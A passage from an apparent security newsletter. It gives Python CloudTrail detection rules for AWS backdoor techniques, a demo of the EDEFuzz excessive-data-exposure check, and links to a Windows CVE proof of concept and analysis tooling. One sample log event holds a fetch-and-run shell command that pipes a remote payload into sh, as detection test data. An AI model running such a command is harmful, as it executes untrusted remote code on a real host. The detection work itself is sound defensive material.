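If they are going to be looked for, CloudTrail is where. The block below is an added example of mine (not from the write-up) of one detection rule per technique in the list, run over a handful of constructed CloudTrail-style records. The field names follow the CloudTrail record layout but the values are invented, real logs redact some request parameters (user data among them), and the duration threshold and document names are assumptions to tune for your own account.

```python
"""Added example: CloudTrail rules for the four AWS backdoor techniques listed above."""
from typing import Any, Dict, Iterable, List

Event = Dict[str, Any]

# Constructed CloudTrail-style records (invented values; layout follows the CloudTrail record format).
SAMPLE_EVENTS: List[Event] = [
    {"eventTime": "2023-08-24T10:01:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetFederationToken", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/build"},
     "requestParameters": {"name": "svc", "durationSeconds": 129600}},
    {"eventTime": "2023-08-24T10:02:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/build"},
     "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2023-08-24T10:03:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifyInstanceAttribute", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/build"},
     "requestParameters": {"instanceId": "i-0123456789abcdef0", "attribute": "userData",
                           "userData": {"value": "<redacted in real logs>"}}},
    {"eventTime": "2023-08-24T10:04:00Z", "eventSource": "ssm.amazonaws.com",
     "eventName": "SendCommand", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/build"},
     "requestParameters": {"documentName": "AWS-RunShellScript", "instanceIds": ["i-0123456789abcdef0"],
                           "parameters": {"commands": ["curl -s http://198.51.100.7/x | sh"]}}},
    {"eventTime": "2023-08-24T10:05:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops"},
     "requestParameters": {}},
]

MAX_SESSION_SECONDS = 12 * 3600            # assumed threshold; longer temporary sessions deserve a look
WORLD_CIDRS = {"0.0.0.0/0", "::/0"}
REMOTE_EXEC_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}


def _params(ev: Event) -> Dict[str, Any]:
    return ev.get("requestParameters") or {}


def rule_long_lived_temp_creds(ev: Event) -> bool:
    """Temporary credentials minted for far longer than an interactive session needs."""
    if ev["eventSource"] != "sts.amazonaws.com" or ev["eventName"] not in ("GetFederationToken", "GetSessionToken"):
        return False
    return int(_params(ev).get("durationSeconds", 0)) > MAX_SESSION_SECONDS


def rule_security_group_opened_to_world(ev: Event) -> bool:
    """An ingress rule from 0.0.0.0/0 or ::/0 added to a security group."""
    if ev["eventName"] != "AuthorizeSecurityGroupIngress":
        return False
    for perm in _params(ev).get("ipPermissions", {}).get("items", []):
        ranges = perm.get("ipRanges", {}).get("items", []) + perm.get("ipv6Ranges", {}).get("items", [])
        if any(r.get("cidrIp") in WORLD_CIDRS or r.get("cidrIpv6") in WORLD_CIDRS for r in ranges):
            return True
    return False


def rule_user_data_modified(ev: Event) -> bool:
    """Instance user data rewritten; the value is often redacted, so key on the attribute alone."""
    p = _params(ev)
    return ev["eventName"] == "ModifyInstanceAttribute" and (p.get("attribute") == "userData" or "userData" in p)


def rule_ssm_remote_execution(ev: Event) -> bool:
    """Run Command used with a shell/PowerShell document."""
    return ev["eventName"] == "SendCommand" and _params(ev).get("documentName") in REMOTE_EXEC_DOCUMENTS


RULES = {
    "long-lived temporary credentials": rule_long_lived_temp_creds,
    "security group opened to the world": rule_security_group_opened_to_world,
    "EC2 user data rewritten": rule_user_data_modified,
    "SSM remote command execution": rule_ssm_remote_execution,
}


def detect_backdoors(events: Iterable[Event]) -> List[Dict[str, str]]:
    """Run every rule over every event; one finding per (rule, event) match, with the acting principal."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                findings.append({"rule": name, "time": ev.get("eventTime", ""),
                                 "actor": ev.get("userIdentity", {}).get("arn", "?"),
                                 "event": f"{ev['eventSource']}:{ev['eventName']}"})
    return findings

if __name__ == "__main__":
    for f in detect_backdoors(SAMPLE_EVENTS):
        print(f)
```

Grouping the findings by actor is the useful next step; a single principal tripping all four in a few minutes, as the build user does here, is a very different picture from four unrelated hits across a month.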
Detecting Excessive Data Exposures in Web Server Responses with Metamorphic Fuzzing
Lianglu Pan, Shaanan Cohney, Toby Murray and Van-Thuan Pham highlight a few things through this work.
The web and its technology stack is still rich in shallow vulnerabilities
Fuzzing in the web context can yield significant value
We have much to do..
Excellent work, but terrifying results.
In this work, we develop a metamorphic relation to tackle that challenge and build the first fuzzing tool -- that we call EDEFuzz -- to systematically detect EDEs. EDEFuzz can significantly reduce false negatives that occur during manual inspection and ad-hoc text-matching techniques, the current most-used approaches.
We tested EDEFuzz against the sixty-nine applicable targets from the Alexa Top-200 and found 33,365 potential leaks -- illustrating our tool's broad applicability and scalability. In a more-tightly controlled experiment of eight popular websites in Australia, EDEFuzz achieved a high true positive rate of 98.65% with minimal configuration, illustrating our tool's accuracy and efficiency.
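The metamorphic relation, as I read the paper, is simple: delete one field from the server’s response and re-render the page; if what the user sees does not change, the client never needed that field and the server is exposing it for nothing. The block below is an added example of mine (not EDEFuzz’s code) that applies the relation to a constructed profile-page JSON response with a constructed renderer standing in for the browser. Output still needs triage, which is also true of the tool: user.id below is harmless, the SSN and password hash are not.

```python
"""Added example: the delete-a-field metamorphic check behind excessive data exposure fuzzing."""
import copy
from typing import Any, Callable, Dict, List, Tuple

Path = Tuple[Any, ...]

# Constructed API response for a profile page. The hashed password, SSN and internal note are the
# sort of fields the server sends but the page never shows.
API_RESPONSE: Dict[str, Any] = {
    "user": {"id": 42, "name": "Ada", "email": "ada@example.com", "role": "member",
             "passwordHash": "$2b$12$constructed", "ssn": "123-45-6789"},
    "internalNotes": "VIP, do not throttle",
    "orders": [{"id": 1, "total": 19.99}, {"id": 2, "total": 5.00}],
}


def render_profile(resp: Dict[str, Any]) -> str:
    """Stand-in for the browser rendering the page from the JSON (constructed; the real tool drives a browser)."""
    user = resp.get("user", {})
    lines = [f"Name: {user.get('name', '')}", f"Email: {user.get('email', '')}", f"Role: {user.get('role', '')}"]
    for order in resp.get("orders", []):
        lines.append(f"Order #{order.get('id', '?')}: {order.get('total', '?')}")
    return "\n".join(lines)


def leaf_paths(obj: Any, prefix: Path = ()) -> List[Path]:
    """Every path to a scalar value, so each field can be deleted on its own."""
    if isinstance(obj, dict):
        return [p for k, v in obj.items() for p in leaf_paths(v, prefix + (k,))]
    if isinstance(obj, list):
        return [p for i, v in enumerate(obj) for p in leaf_paths(v, prefix + (i,))]
    return [prefix]


def without(obj: Any, path: Path) -> Any:
    """Deep copy of obj with the value at path removed (dict key deleted or list item dropped)."""
    mutated = copy.deepcopy(obj)
    parent = mutated
    for step in path[:-1]:
        parent = parent[step]
    del parent[path[-1]]
    return mutated


def find_excessive_fields(response: Dict[str, Any], render: Callable[[Dict[str, Any]], str]) -> List[str]:
    """Metamorphic relation: removing a field the client needs changes the page; removing one it
    does not need leaves the page identical, so that field is a candidate excessive exposure."""
    baseline = render(response)
    exposed = []
    for path in leaf_paths(response):
        if render(without(response, path)) == baseline:
            exposed.append(".".join(str(step) for step in path))
    return exposed

if __name__ == "__main__":
    print(find_excessive_fields(API_RESPONSE, render_profile))
```

Against a real target the render function is a browser session and the comparison is on the DOM rather than a string, with a little noise handling for timestamps and session tokens; the relation itself does not change.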
What is being exploited.
CVE-2023-36874: PoC for LPE in Windows Error Reporting Service
Filip Dragović replicates a vulnerability originally found in the wild which was described as:
[We discovered] unknown exploit kit leveraging a still-unknown vulnerability affecting the Windows Error Reporting (WER) component. Our team prepared to report this newly discovered vulnerability to Microsoft — only to discover that the Google Threat Analysis Group had independently discovered and disclosed it shortly before we did. Microsoft assigned the identifier CVE-2023-36874 to the vulnerability.
This is that exploit weaponized for all to use.
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
IODA (Internet Outage Detection and Analysis)
Maybe useful to some.
an operational prototype system that monitors the internet, in near-realtime, to identify macroscopic Internet outages affecting the edge of the network, i.e. significantly impacting an AS (Autonomous System) or a large fraction of a country.
Generating FLIRT signatures for Nim and other non-C programming languages
Holger Unterbrink shows how to generate Fast Library Identification and Recognition Technology (FLIRT) signatures for other languages in IDA.
for Nim, generating signatures is distinctly more difficult. The techniques described in this blog post focus on how to overcome the challenges associated with generating a signature file for the Nim programming language. However, these techniques can easily be applied to other languages or situations where malware authors use special and uncommon compiler switches to make standard library profiling more challenging for investigators.
Some other small (and not so small) bits and bobs which might be of interest.
Monthly Threat Actor Group Intelligence Report, June 2023 (ENG) - from Korea, and lagged.
IR 8477, Mapping Relationships Between Documentary Standards, Regulations, Frameworks, and Guidelines: Developing Cybersecurity and Privacy Concept Mappings - This document describes an approach that NIST would use and other parties could use for mapping the elements of documentary standards, regulations, frameworks, and guidelines to NIST publications, such as CSF Subcategories or SP 800-53r5 controls.
A Little Bit Of History - the story behind how Assemblyline got started - the Canadian Government’s open-source malware analysis pipeline